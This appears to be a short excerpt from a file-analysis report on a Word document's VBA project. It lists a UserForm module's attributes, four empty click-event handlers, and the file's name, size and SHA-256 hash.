Attribute VB_Base = "0{D3EAE98C-A86F-439B-B648-E44CC1EC052E}{03F9CF53-E5A6-4618-8335-9221404B88DB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ToggleButton1_Click()
End Sub
Private Sub ToggleButton3_Click()
End Sub
Private Sub ToggleButton4_Click()
End Sub
Private Sub UserForm_Click()
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 105984 bytes |
SHA-256: c1be933d13739d965583ff33c3a4a33d76d0fc7faecd34edcc1a33ad13ce2ed5 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.